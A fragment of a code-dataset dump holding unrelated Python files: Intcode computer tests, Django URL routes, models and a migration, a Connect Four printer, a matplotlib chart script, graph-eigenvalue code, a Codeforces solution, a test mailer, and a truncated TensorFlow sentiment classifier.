# initializer\n i = 0\n for languages in Language.query.all():\n language_array[i] = language_array[i]*100/count\n language_string[i] = languages.language_name + \" : \" + str(language_array[i])\n i += 1\n i = 0\n for framework in Framework.query.all():\n framework_array[i] = framework_array[i]*100/count\n framework_string[i] = framework.framework_name + \" : \" + str(framework_array[i])\n i += 1\n i = 0\n for ides in Ide.query.all():\n ide_array[i] = ide_array[i]*100/count\n ide_string[i] = ides.ide + \" : \" + str(ide_array[i])\n i += 1\n i = 0\n for os in OS.query.all():\n os_array[i] = os_array[i]*100/count\n os_string[i] = os.os + \" : \" + str(os_array[i])\n i += 1\n\n return {\"language\": language_array, \"framework\": framework_array, \"ide\": ide_array, \"os\": os_array}\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"resource/result.py","file_name":"result.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"557969690","text":"import pytest\n\nfrom intcomp import integerComputer\n\n@pytest.fixture\ndef intcomp():\n \"\"\"intcomp with empty program\"\"\"\n intcomp = integerComputer()\n intcomp.program = []\n intcomp.outputs = []\n intcomp.intputs = []\n return intcomp\n\n\n\ndef test_readProgramFile(intcomp):\n intcomp.readProgramFile(\"testfile.txt\")\n testprogram = [1,2,3,4,7]\n assert intcomp.program == testprogram\n\ndef test_addMemory(intcomp):\n intcomp.program = [0]\n intcomp.addMemory(1204978)\n assert intcomp.program == ([0] * 1204979)\n\ndef test_getArgument(intcomp):\n intcomp.program = [1,4,5,6,35,12,0]\n assert intcomp.getArgument(1, 0) == 35\n assert intcomp.getArgument(1, 1) == 4\n intcomp.revBase = 2\n assert intcomp.getArgument(1, 2) == 0\n\ndef test_add(intcomp):\n intcomp.program = [1,4,5,6,35,12,0]\n intcomp.add(0, 0, 2)\n assert intcomp.program == [1,4,5,6,35,12,47]\n assert intcomp.pointer == 4\n\ndef test_multiply(intcomp):\n intcomp.program = [1,4,5,6,6,12,0]\n intcomp.multiply(0, 0, 2)\n assert intcomp.program == [1,4,5,6,6,12,72]\n assert intcomp.pointer == 4\n\ndef test_input(intcomp):\n intcomp.program = [3, 2, 0]\n intcomp.input(17, 1)\n assert intcomp.program == [3, 2, 17]\n assert intcomp.pointer == 2\n\ndef test_output(intcomp):\n intcomp.program = [4, 2, 0]\n intcomp.output(0)\n assert intcomp.outputs[0] == 0\n intcomp.pointer = 0\n intcomp.output(1)\n assert intcomp.outputs[1] == 2\n assert intcomp.pointer == 2\n\ndef test_jumpIfTrue(intcomp):\n intcomp.program = [5, 0, 0, 6, 6]\n intcomp.jumpIfTrue(1,0)\n assert intcomp.pointer == 3\n intcomp.pointer = 0\n intcomp.program = [5, 1, 0, 6, 6, 7]\n intcomp.jumpIfTrue(0, 1)\n assert intcomp.pointer == 0\n intcomp.pointer = 0\n intcomp.program = [5, 1, 0, 6, 6, 7]\n intcomp.jumpIfTrue(0, 0)\n assert intcomp.pointer == 5\n\ndef test_jumpIfFalse(intcomp):\n intcomp.program = [5, 0, 0, 6, 6]\n intcomp.jumpIfFalse(1,0)\n assert intcomp.pointer == 5\n intcomp.pointer = 0\n intcomp.program = [5, 1, 0, 6, 6, 7]\n intcomp.jumpIfFalse(0, 1)\n assert intcomp.pointer == 3\n intcomp.pointer = 0\n intcomp.program = [5, 3, 0, 0, 6, 7]\n intcomp.jumpIfFalse(0, 0)\n assert intcomp.pointer == 5\n\ndef test_lessThan(intcomp):\n intcomp.program = [6, 0, 2, 0]\n intcomp.lessThan(1,1,2)\n assert intcomp.program == [1, 0, 2, 0]\n intcomp.pointer = 0\n intcomp.program = [6, 0, 2, 0]\n intcomp.lessThan(0,1,0)\n assert intcomp.program == [0, 0, 2, 0]\n assert intcomp.pointer == 4\n\ndef test_equals(intcomp):\n intcomp.program = [7, 0, 2, 0]\n intcomp.equals(1,1,0)\n assert intcomp.program == [0, 0, 2, 0]\n intcomp.pointer = 0\n intcomp.program = [7, 1, 1, 0]\n intcomp.equals(0,1,2)\n assert intcomp.program == [1, 1, 1, 0]\n assert intcomp.pointer == 4\n\ndef trest_revBaseOffset(intcomp):\n intcomp.revBase = 0\n intcomp.program = [109, 2, 6, 4, 7]\n intcomp.pointer = 0\n intcomp.revBaseOffset(1)\n assert intcomp.revBase == 2\n intcomp.pointer = 0\n intcomp.revBaseOffset(2)\n assert intcomp.revBase == 6\n assert intcomp.pointer == 2\n\ndef test_day02(intcomp):\n intcomp.readProgramFile(\"d:\\\\workspace\\\\aoc2019\\\\day09\\\\python\\\\thomg\\\\program_day02.txt\")\n intcomp.run(0)\n assert intcomp.program[0] == 4462686\n\ndef test_day05(intcomp):\n intcomp.readProgramFile(\"d:\\\\workspace\\\\aoc2019\\\\day09\\\\python\\\\thomg\\\\program_day05.txt\")\n intcomp.run(5)\n assert intcomp.outputs[0] == 8805067\n\ndef test_day09(intcomp):\n intcomp.pointer = 0\n intcomp.revBase = 0\n intcomp.program = [109,1,204,-1,1001,100,1,100,1008,100,16,101,1006,101,0,99]\n intcomp.addMemory(100000)\n intcomp.run(0)\n assert intcomp.outputs == [109,1,204,-1,1001,100,1,100,1008,100,16,101,1006,101,0,99]\n\n intcomp.pointer = 0\n intcomp.revBase = 0\n intcomp.outputs = []\n intcomp.program = [1102,34915192,34915192,7,4,7,99,0]\n intcomp.addMemory(100000)\n intcomp.run(0)\n assert len(str(intcomp.outputs[0])) == 16\n\n intcomp.pointer = 0\n intcomp.revBase = 0\n intcomp.outputs = []\n intcomp.program = [104,1125899906842624,99]\n intcomp.run(0)\n assert intcomp.outputs[0] == 1125899906842624\n\n intcomp.reset()\n intcomp.readProgramFile(\"d:\\\\workspace\\\\aoc2019\\\\day09\\\\python\\\\thomg\\\\program_day09.txt\")\n intcomp.addMemory(10000)\n intcomp.run(2)\n assert intcomp.outputs[0] == 69781\n","sub_path":"day09/python/thomg/test_intcomp.py","file_name":"test_intcomp.py","file_ext":"py","file_size_in_byte":4422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"627262668","text":"def affichage_V2(grille):\n affichage_propre1 = \"|\"\n affichage_propre2 = \"|\"\n affichage_propre3 = \"|\"\n affichage_propre4 = \"|\"\n affichage_propre5 = \"|\"\n affichage_propre6 = \"|\"\n\n\n for i in grille:\n for j in i:\n if j == '':\n if len(affichage_propre1) < 15:\n affichage_propre1 += ' '\n affichage_propre1 += '|'\n elif len(affichage_propre2) < 15:\n affichage_propre2 += ' '\n affichage_propre2 += '|'\n elif len(affichage_propre3) < 15:\n affichage_propre3 += ' '\n affichage_propre3 += '|'\n elif len(affichage_propre4) < 15:\n affichage_propre4 += ' '\n affichage_propre4 += '|'\n elif len(affichage_propre5) < 15:\n affichage_propre5 += ' '\n affichage_propre5 += '|'\n elif len(affichage_propre6) < 15:\n affichage_propre6 += ' '\n affichage_propre6 += '|'\n else:\n if len(affichage_propre1) < 15:\n affichage_propre1 += j\n affichage_propre1 += '|'\n elif len(affichage_propre2) < 15:\n affichage_propre2 += j\n affichage_propre2 += '|'\n elif len(affichage_propre3) < 15:\n affichage_propre3 += j\n affichage_propre3 += '|'\n elif len(affichage_propre4) < 15:\n affichage_propre4 += j\n affichage_propre4 += '|'\n elif len(affichage_propre5) < 15:\n affichage_propre5 += j\n affichage_propre5 += '|'\n elif len(affichage_propre6) < 15:\n affichage_propre6 += j\n affichage_propre6 += '|'\n\n print(' 1 2 3 4 5 6 7')\n print(affichage_propre1)\n print(affichage_propre2)\n print(affichage_propre3)\n print(affichage_propre4)\n print(affichage_propre5)\n print(affichage_propre6)\n","sub_path":"Theme A/DM 1/Puissance4_affichage_V2.py","file_name":"Puissance4_affichage_V2.py","file_ext":"py","file_size_in_byte":2146,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"553383281","text":"\"\"\"shopping_system URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.11/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom django.contrib import admin\nfrom home import views as home_views\nfrom user_home import views as user_home_views\nfrom shopping_home import views as shopping_home_views\nfrom news_home import views as news_home_views\n\nurlpatterns = [\n url(r'^admin/', admin.site.urls),\n url(r'^home$', home_views.home),\n # 图像验证码\n url(r'^captcha', include('captcha.urls')),\n # 用户中心的路由\n url(r'^index/', user_home_views.index),\n url(r'^login/', user_home_views.login),\n url(r'^register/', user_home_views.register),\n url(r'^modify/', user_home_views.modify),\n url(r'^logout/', user_home_views.logout),\n url(r'^order/', user_home_views.order),\n # 商场中心的路由\n url(r'^shop/', shopping_home_views.shop),\n url(r'^type/', shopping_home_views.type),\n url(r'^goods/', shopping_home_views.goods),\n url(r'^buy/', shopping_home_views.buy),\n url(r'^shop_car/', shopping_home_views.shop_car),\n url(r'^offer/', shopping_home_views.offer),\n url(r'^search/', shopping_home_views.search),\n # 新闻中心的路由\n url(r'^news_home/', news_home_views.news),\n]\n","sub_path":"shopping_system/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1814,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"279881605","text":"#-*- coding: utf8 -*-\n\nfrom django.db import models\nfrom tinymce import models as tinymce_model\n\n# Create your models here.\n\n\nclass Article(models.Model):\n picture = models.ImageField('Картинка', upload_to=\"images/news/\")\n date = models.DateField('Дата создания')\n theme = models.CharField('Тема', max_length=40)\n shortname = models.CharField('Короткое имя (для ссылки)', max_length=20)\n text = tinymce_model.HTMLField('Текст новости')\n\n def __str__(self):\n return \"%s \" % (unicode(unicode(self.theme)))\n\n\n def __unicode__(self):\n return \"%s \" % (unicode(unicode(self.theme)))\n\n class Meta:\n verbose_name = 'новость'\n verbose_name_plural = 'новости'\n\n\nclass Partner(models.Model):\n types = (\n ('1', 'Генеральный партнёр'),\n ('2', 'Ключевой партнёр'),\n ('3', 'Карьерный партнёр'),\n ('4', 'Информационный партнёр'),\n )\n picture = models.ImageField('Фотография', upload_to='images/logos/%D')\n name = models.CharField('Название', max_length=30)\n type = models.CharField('Тип', max_length=1, choices=types)\n url = models.CharField('URL', max_length=60)\n\n def __str__(self):\n return \"%s \" % (unicode(unicode(self.name)))\n\n def __unicode__(self):\n return \"%s \" % (unicode(unicode(self.name)))\n\n class Meta:\n verbose_name = 'партнёр'\n verbose_name_plural = 'партнёры'\n\nclass Activity(models.Model):\n types = (\n ('Career Zone', 'Career Zone',),\n ('Corporate Zone','Corporate Zone'),\n ('Startup Zone', 'Startup Zone',),\n ('Creative Zone','Creative Zone',),\n ('Skills up','Skills up',),\n ('Success Zone','Success Zone',),\n (u'Другое', u'Другое',),\n )\n name = models.CharField('Имя', max_length=60)\n shortname = models.CharField('Короткое имя (для ссылки)', max_length=20)\n type = models.CharField('Тип', max_length=30, choices=types)\n photo = models.ImageField('Фотография', blank=True, upload_to='images/photos/')\n place = models.CharField('Где проводится', blank=True, max_length=20)\n speaker = models.CharField('Докладчик', blank=True, max_length=30)\n position = models.CharField('Должность докладчика', blank=True, max_length=100)\n cospeakers = models.CharField('Со-докладчики (через ;)', blank=True, max_length=500)\n description = tinymce_model.HTMLField(blank=True)\n time = models.TimeField('Время выступления')\n\n def __str__(self):\n return \"%s \" % (unicode(unicode(self.name)))\n\n def __unicode__(self):\n return \"%s \" % (unicode(unicode(self.name)))\n\n class Meta:\n verbose_name = 'доклад'\n verbose_name_plural = 'доклады'\n\nclass Settings(models.Model):\n vk_link = models.CharField('Ссылка ВКонтакте', max_length=30)\n fb_link = models.CharField('Ссылка в Facebook', max_length=30)\n reg_link = models.CharField('Ссылка на регистрацию', max_length=40)\n y_2014_link = models.CharField('Ссылка на 2014 год', max_length=40)\n y_2013_link = models.CharField('Ссылка на 2013 год', max_length=40)\n y_2012_link = models.CharField('Ссылка на 2012 год', max_length=40)\n\n class Meta:\n verbose_name = 'настройки'\n verbose_name_plural = 'настройки'","sub_path":"CareerNight/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3622,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"10631283","text":"#!/usr/bin/env python3\n\n\"\"\"\n=========================================================================\nA Python script to plot my phone's internal storage usage with matplotlib\n=========================================================================\n\nAuthor: Tadej Janež\nLicense: MIT\n\nBased on https://matplotlib.org/mpl_examples/pie_and_polar_charts/pie_demo_features.py\n\n\"\"\"\nfrom pathlib import Path\n\nfrom matplotlib.font_manager import FontProperties\nimport matplotlib.pyplot as plt\n\n# My phone's internal storage usage by file type\nfile_types_and_usage = (\n ('image | jpeg', 1483),\n ('video | mp4', 678),\n ('audio | mpeg', 642),\n ('audio | ogg', 405),\n ('application | octet-stream', 103),\n ('other', 247),\n)\n\n# Prepare fonts\nfont1 = FontProperties()\nfont1.set_family('Source Han Sans TW')\nfont2 = font1.copy()\nfont2.set_size('small')\n\n# Prepare subplots\nfig1, ax1 = plt.subplots()\n\n# Draw pie chart\n_, texts, autotexts = ax1.pie(\n # sizes\n [ftu[1] for ftu in file_types_and_usage],\n labels=[ftu[0] for ftu in file_types_and_usage],\n autopct='%1.f%%',\n pctdistance=0.7,\n startangle=90\n)\n# Set equal aspect ratio to ensure that pie is drawn as a circle\nax1.axis('equal')\n\n# Set fonts\nplt.setp(texts, fontproperties=font1)\nplt.setp(autotexts, fontproperties=font2)\n\nfig1.savefig(str(Path('..', 'images', 'android-internal-storage-backup-usage.svg')))\n","sub_path":"scripts/android-internal-storage-backup-usage.py","file_name":"android-internal-storage-backup-usage.py","file_ext":"py","file_size_in_byte":1390,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"301604956","text":"from debt_context.models import CityDebt, CountyDebt, SchoolDistrictDebt\nfrom debt_context.services.city_context_service import CityContextService\nfrom debt_context.services.county_context_service import CountyContextService\nfrom debt_context.services.isd_context_service import ISDContextService\n\n\nclass ContextService(object):\n def __init__(self, issuer):\n self.issuer = issuer\n self.city_context_service = CityContextService(issuer)\n self.county_context_service = CountyContextService(issuer)\n self.isd_context_service = ISDContextService(issuer)\n\n def context(self):\n if type(self.issuer) is CityDebt:\n return {\n 'population': self.city_context_service.population_context(),\n 'assessedValuation': self.city_context_service.assessed_valuation()\n }\n elif type(self.issuer) is CountyDebt:\n return {\n 'population': self.county_context_service.population_context(),\n 'assessedValuation': self.county_context_service.assessed_valuation()\n }\n elif type(self.issuer) is SchoolDistrictDebt:\n return {\n 'students': self.isd_context_service.debt_similar_school_size(),\n 'debtToAssessedValuation': self.isd_context_service.similar_assessed_valuation()\n }\n","sub_path":"debt_context/services/context_service.py","file_name":"context_service.py","file_ext":"py","file_size_in_byte":1358,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"251198459","text":"import numpy as np \nfrom networkx.linalg.laplacianmatrix import laplacian_matrix, normalized_laplacian_matrix\nfrom scipy.sparse.linalg import eigs as sparse_eigs\nimport core.state as state\nimport networkx as nx\n\ndef _get_inputs():\n G = state.GRAPH\n n = len(state.GRAPH.nodes)\n in_degrees = G.in_degree()\n input_enc = np.array([in_degrees[i] == 0 for i in range(n)]).reshape(n,1)\n return input_enc\n\ndef _adjust_weights():\n G = state.GRAPH\n out_degrees = G.out_degree()\n for u, v, d in G.edges(data=True):\n deg = out_degrees[u]\n d['weight_out'] = 1/deg\n\ndef _get_lap_mat():\n _adjust_weights()\n G = state.GRAPH.to_undirected()\n return nx.laplacian_matrix(G, weight=\"weight_out\")\n\ndef _get_laplacian_spectrum(k=None):\n # get the k smallest eigenvalues of the laplacian\n lap = _get_lap_mat()\n if k is None:\n k = len(state.GRAPH.nodes()) - 2\n # print(lap)\n \n # lap = lap.asfptype()\n lambdas = sparse_eigs(lap, k=k, return_eigenvectors=False, which=\"SR\") # get k smallest eigenvalues\n return np.real(np.sort(lambdas))\n\ndef _compute_w_eigs(n, k):\n eig_vals = np.ones(k) * np.floor(n/k)\n for i in range(n % k):\n eig_vals[i] += 1\n return eig_vals\n\ndef _laplacian_spectral_bound(lambdas, M):\n # given lambdas, compute the spectral bound\n G = state.GRAPH\n k, n = len(lambdas), len(G.nodes)\n k_vals = list(range(2,k))\n def compute_bound(i):\n w_eigs = _compute_w_eigs(n, i)\n return np.dot(w_eigs, lambdas[:i]) - 2*i*M\n vals = [compute_bound(i) for i in k_vals]\n maxval = np.max(vals)\n maxk = k_vals[np.argmax(vals)]\n return maxval, maxk\n\ndef count_inputs_outputs():\n G = state.GRAPH\n n = len(G.nodes)\n out_degrees = G.out_degree()\n in_degrees = G.in_degree()\n count = 0\n for i in range(n):\n if in_degrees[i] == 0 or out_degrees[i] == 0:\n count += 1\n return count\n\ndef compute_eigenvalue_bound(M_vals, k=None):\n disk_count = count_inputs_outputs()\n # print(disk_count)\n lambdas = _get_laplacian_spectrum(k)\n return disk_count, [_laplacian_spectral_bound(lambdas, M) for M in M_vals]\n","sub_path":"core/eig_solver.py","file_name":"eig_solver.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"491386703","text":"\"\"\"\r\n14 Arrival of the General - https://codeforces.com/problemset/problem/144/A\r\n\"\"\"\r\ninput()\r\nsol=list(map(int,input().split()))\r\nswap=0 \r\nmaxm=sol.index(max(sol))\r\n\r\nfor i in range(1,len(sol)+1):\r\n if sol[-i]==min(sol):\r\n minm=len(sol)-i\r\n break\r\nif minm>maxm:\r\n swap=swap+((len(sol)-1)-minm)\r\n swap=swap+maxm\r\nelse:\r\n swap=swap+((len(sol)-1)-minm)\r\n swap=swap+(maxm-1)\r\n\r\nprint(swap)\r\n \r\n","sub_path":"A2OJ-11/014_A_Arrival_of_the_General.py","file_name":"014_A_Arrival_of_the_General.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"244976911","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('payment', '0001_initial'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='account',\n name='reply',\n ),\n migrations.AddField(\n model_name='account',\n name='external_id',\n field=models.CharField(default='1', max_length=40, verbose_name=b'External ID'),\n preserve_default=False,\n ),\n migrations.AlterField(\n model_name='account',\n name='partner',\n field=models.CharField(default=b'MANGOPAY', max_length=20, verbose_name=b'Partner', choices=[(b'MANGOPAY', b'MangoPay')]),\n ),\n ]\n","sub_path":"api/payment/migrations/0002_auto_20140930_1130.py","file_name":"0002_auto_20140930_1130.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"193724752","text":"def send_mail():\n message = \"Est message\"\n logging.error(message)\n try:\n server = smtplib.SMTP('nyc-spam1.corp.yodle.com')\n fromaddr = \"eric.berg@yodle.com\"\n toaddrs = [\"eric.berg@yodle.com\", \"eberg@bergbrains.com\"]\n server.set_debuglevel(1)\n server.sendmail(fromaddr, toaddrs, message)\n server.quit()\n except:\n logging.error(\"Failed to send email to Eric\")\n\n","sub_path":"sendmail-test.py","file_name":"sendmail-test.py","file_ext":"py","file_size_in_byte":420,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"509471203","text":"#this model will be a simple dnn which extract features from\n# bags of words and timestamps to classify comments by success\n#no model savings as\nimport tensorflow as tf\nimport string\nimport nltk\nimport sqlite3\nimport traceback\nimport logging\nimport time\nimport random\nimport datetime\nimport numpy as np\nimport pandas as pd\nimport os\n\nlogging.basicConfig(level=logging.INFO)\nlogger = logging.getLogger(__name__)\n\n#TODO: store ngrams in db to allow model storing\n\nnodes_per_layer = 2000\nmax_results_to_analyze = 10000000\nget_newest_results = True #if i cut out some results, this will only get newer results keeping my bot more updated in the meta\nstop_word_list = list(nltk.corpus.stopwords.words('english'))\nnum_of_score_buckets = 10\nnum_of_features_per_n = 200\nnum_of_n_for_ngram = 5\nsubreddit_list = []\n\nn_classes = 2\nmodel_name = \"sentiment_model_5L_final.ckpt\"\ntemp_model_name= \"/tmp/sentiment_model_5L_final.ckpt\"\ncurrent_directory = os.getcwd()\nfinal_directory = os.path.join(current_directory, r'models')\nif not os.path.exists(final_directory):\n os.makedirs(final_directory)\nmodel_location = os.path.join(final_directory, model_name)\n\nclass NB_sentiment_classifier():\n\n def __init__(self, save_model = True, load_eligible = True):\n self.model_needs_retraining = False\n self.border_values = [] # any num above this\n self.n_gram_orders_dict = {}\n #self.input_width = self.get_input_size()\n self.input_width = num_of_features_per_n*(num_of_n_for_ngram - 1)\n self.optimizer, self.cost, self.x, self.y, self.sess, self.prediction, self.saver = self.build_neural_network(load_eligible = load_eligible)\n\n\n def run_text(self, text):\n input_features = self.create_input_features(text)\n return self.sess.run(self.prediction, feed_dict = {self.x:[input_features]})\n\n def train_nn(self, epochs):\n if len(self.n_gram_orders_dict.keys()) == 0:\n self.read_metadata(num_of_n_for_ngram, num_of_features_per_n)\n self.train_neural_network(epochs, self.optimizer, self.cost, self.x, self.y, self.sess, self.prediction)\n self.save_model()\n\n def save_model(self):\n if self.save_enabled:\n save_path = self.saver.save(self.sess, model_location)\n self.save_ngrams()\n print(\"Model saved in file: %s\" % save_path)\n\n def load_model(self, saver, sess):\n if not os.path.exists(final_directory):\n os.makedirs(final_directory)\n saver.restore(sess, model_location)\n self.load_ngrams()\n\n def build_neural_network(self, load_eligible = True):\n start_time = time.time()\n #data = tf.placeholder('float')\n x = tf.placeholder('float', [None, self.input_width])\n y = tf.placeholder('float', [None, n_classes])\n keep_prob = tf.placeholder(tf.float32)\n prediction = self.neural_network_model(nodes_per_layer, x)\n cost = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(logits=prediction, labels=y))\n optimizer = tf.train.AdamOptimizer().minimize(cost)\n saver = tf.train.Saver()\n sess = tf.Session()\n if load_eligible:\n try:\n self.load_model(saver, sess)\n except:\n print('initializing')\n traceback.print_exc()\n sess.run(tf.global_variables_initializer())\n self.model_needs_retraining = True\n else:\n print('initializing')\n sess.run(tf.global_variables_initializer())\n self.model_needs_retraining = True\n\n return optimizer, cost, x, y, sess, prediction,saver\n\n def neural_network_model(self, nodes_per_layer, x):\n hidden_1_layer = {'weights': tf.Variable(tf.random_normal([self.input_width, nodes_per_layer])),\n 'biases': tf.Variable(tf.random_normal([nodes_per_layer]))}\n hidden_2_layer = {'weights': tf.Variable(tf.random_normal([nodes_per_layer, nodes_per_layer])),\n 'biases': tf.Variable(tf.random_normal([nodes_per_layer]))}\n hidden_3_layer = {'weights': tf.Variable(tf.random_normal([nodes_per_layer, nodes_per_layer])),\n 'biases': tf.Variable(tf.random_normal([nodes_per_layer]))}\n hidden_4_layer = {'weights': tf.Variable(tf.random_normal([nodes_per_layer, nodes_per_layer])),\n 'biases': tf.Variable(tf.random_normal([nodes_per_layer]))}\n hidden_5_layer = {'weights': tf.Variable(tf.random_normal([nodes_per_layer, nodes_per_layer])),\n 'biases': tf.Variable(tf.random_normal([nodes_per_layer]))}\n output_layer = {'weights': tf.Variable(tf.random_normal([nodes_per_layer, n_classes])),\n 'biases': tf.Variable(tf.random_normal([n_classes]))}\n\n\n\n keep_prob = .5\n l1 = tf.add(tf.matmul(x, hidden_1_layer['weights']), hidden_1_layer['biases'])\n l1 = tf.nn.relu(l1)\n l2 = tf.add(tf.matmul(l1, hidden_2_layer['weights']), hidden_2_layer['biases'])\n l2 = tf.nn.relu(l2)\n l3 = tf.add(tf.matmul(l2, hidden_3_layer['weights']), hidden_3_layer['biases'])\n l3 = tf.nn.relu(l3)\n l4 = tf.add(tf.matmul(l3, hidden_4_layer['weights']), hidden_4_layer['biases'])\n l4 = tf.nn.relu(l4)\n l4_dropout = tf.nn.dropout(l4, keep_prob)\n l5 = tf.add(tf.matmul(l4_dropout, hidden_5_layer['weights']), hidden_5_layer['biases'])\n l5 = tf.nn.relu(l5)\n l5_dropout = tf.nn.dropout(l5, keep_prob)\n output = tf.matmul(l5_dropout, output_layer['weights']) + output_layer['biases']\n\n return output\n\n def train_neural_network(self, epochs, optimizer, cost, x, y, sess, prediction):\n batch_size = 100\n hm_epochs = epochs\n inputs = get_input()\n random.shuffle(inputs)\n train_x, train_y, test_x, test_y = self.create_feature_sets_and_labels(inputs)\n del inputs[:]\n\n logger.info('training size: {0}, testing size: {1}'.format(len(train_x), len(test_x)))\n logger.info('starting training')\n for epoch in range(hm_epochs):\n epoch_loss = 0\n i=0\n while i < len(train_x):\n start = i\n end = i + batch_size\n batch_x = np.array(train_x[start:end])\n batch_y = np.array(train_y[start:end])\n _, c = sess.run([optimizer, cost], feed_dict= {x:batch_x, y:batch_y})\n epoch_loss += c\n i += batch_size\n logger.info(\"Epoch {0} completed out of {1}, loss: {2}\".format(epoch, hm_epochs,epoch_loss))\n\n correct = tf.equal(tf.argmax(prediction, 1), tf.argmax(y, 1))\n accuracy = tf.reduce_mean(tf.cast(correct, 'float'))\n accuracy_float = accuracy.eval(session = sess, feed_dict = {x:test_x, y:test_y})\n print('Accuracy:', accuracy_float)\n return sess, prediction, x, y\n\n def create_feature_sets_and_labels(self, inputs, test_size = .01):\n random.shuffle(inputs)\n feature_list = []\n\n for i in inputs:\n #print(i[0], i[1])\n feature_list.append([self.create_input_features(i), self.create_output_features(i)])\n\n testing_size = int(test_size*len(inputs))\n train_x = [i[0] for i in feature_list[testing_size:]]\n train_y = [i[1] for i in feature_list[testing_size:]]\n test_x = [i[0] for i in feature_list[:testing_size]]\n test_y = [i[1] for i in feature_list[:testing_size]]\n return train_x, train_y, test_x, test_y\n\n def create_output_features(self, output):\n if output[1] != 0 and output[1] != 1:\n raise Exception()\n if output[1] == 1:\n return [1, 0]\n else:\n return [0, 1]\n\n def create_input_features(self, i):\n sentence_features = get_text_features(i[0], self.n_gram_orders_dict)\n return sentence_features\n\n #build ngrams and rank comments\n #sort the ngrams by how common they are, store the most common ones\n def read_metadata(self, max_n, num_of_features_per_n):\n n_gram_dicts = {}\n self.score_list = []\n self.n_gram_orders_dict = {}\n\n for n in range(1, max_n):\n n_gram_dicts.setdefault(n, {})\n res = get_input()\n comments = []\n for r in res:\n comments.append(clean_and_tokenize(r[0]))\n for comment in comments:\n for n in range(1, max_n):\n if len(comment) >= n:\n for i in range(len(comment) - n):\n current_value = n_gram_dicts[n].get(' '.join(comment[i:i+n]), 0)\n n_gram_dicts[n][' '.join(comment[i:i+n])] = current_value + 1\n else:\n break\n for n in range(1, max_n):\n self.n_gram_orders_dict[n] = get_dict_keys_sorted_by_values(n_gram_dicts[n], num_of_features_per_n)\n\n\n def save_ngrams(self):\n with sqlite3.connect('reddit.db') as conn:\n try:\n conn.execute('drop table sentiment_table_values')\n except:\n pass\n conn.execute('create table if not exists sentiment_table_values (timestamp int, n int, word TEXT, rank int)')\n current_timestamp = int(float(datetime.datetime.now().timestamp()))\n for n in range(1, num_of_n_for_ngram):\n for rank, i in enumerate(self.n_gram_orders_dict[n]):\n conn.execute('insert into sentiment_table_values values (?, ?, ?, ?)', (current_timestamp, n, i[0], rank))\n conn.commit()\n\n def load_ngrams(self):\n self.n_gram_orders_dict = {}\n with sqlite3.connect('reddit.db') as conn:\n max_rank = conn.execute('''select max(rank)\n from sentiment_table_values''').fetchone()[0]\n max_n = conn.execute('''select max(n)\n from sentiment_table_values''').fetchone()[0]\n for i in range(1, max_n + 1):\n self.n_gram_orders_dict[i] = ['' for i in range(max_rank+1)]\n\n for n in range(1, max_n + 1):\n for r in range(max_rank+1):\n self.n_gram_orders_dict[n][r] = conn.execute('''select word from sentiment_table_values where rank = ? and n = ?''', (r, n)).fetchone()[0]\n\n#Feature creation methods:\ndef get_text_features(text, n_gram_dict):\n word_features = [0 for i in range(len(n_gram_dict.keys())*len(n_gram_dict[1]))]\n index = 0\n\n formatted_word = format_text(text)\n for n in n_gram_dict.keys():\n for i in n_gram_dict[n]:\n if i in formatted_word:\n word_features[index] = 1\n index+= 1\n return word_features\n\ndef format_text(input_text):\n return ' '.join(clean_and_tokenize(input_text))\n\ndef clean_and_tokenize(input_text):\n clean_text = remove_punctuation_from_text(input_text.lower())\n return remove_stopwords_from_list(nltk.tokenize.word_tokenize(clean_text))\n\ndef remove_stopwords_from_list(input_list):\n results = []\n for i in input_list:\n if i not in stop_word_list:\n results.append(i)\n return results\n\ndef remove_punctuation_from_text(input_text):\n exclude = set(string.punctuation)\n return ''.join(ch for ch in input_text if ch not in exclude)\n\ndef remove_stopwords_from_list(input_list):\n results = []\n for i in input_list:\n if i not in stop_word_list:\n results.append(i)\n return results\n\ndef get_subreddit_features(subreddit, subreddit_list):\n subreddit_features = np.zeros(len(subreddit_list)) #[0 for i in range(len(subreddit_list))]\n subreddit_features[subreddit_list.index(subreddit)] = 1\n return subreddit_features\n\n#Helper methods:\ndef remove_stopwords_from_list(input_list):\n results = []\n for i in input_list:\n if i not in stop_word_list:\n results.append(i)\n return results\n\ndef get_dict_keys_sorted_by_values(d, number_to_return, reverse = True):\n sorting_list = []\n for i in d.items():\n sorting_list.append(i)\n sorting_list = sorted(sorting_list, 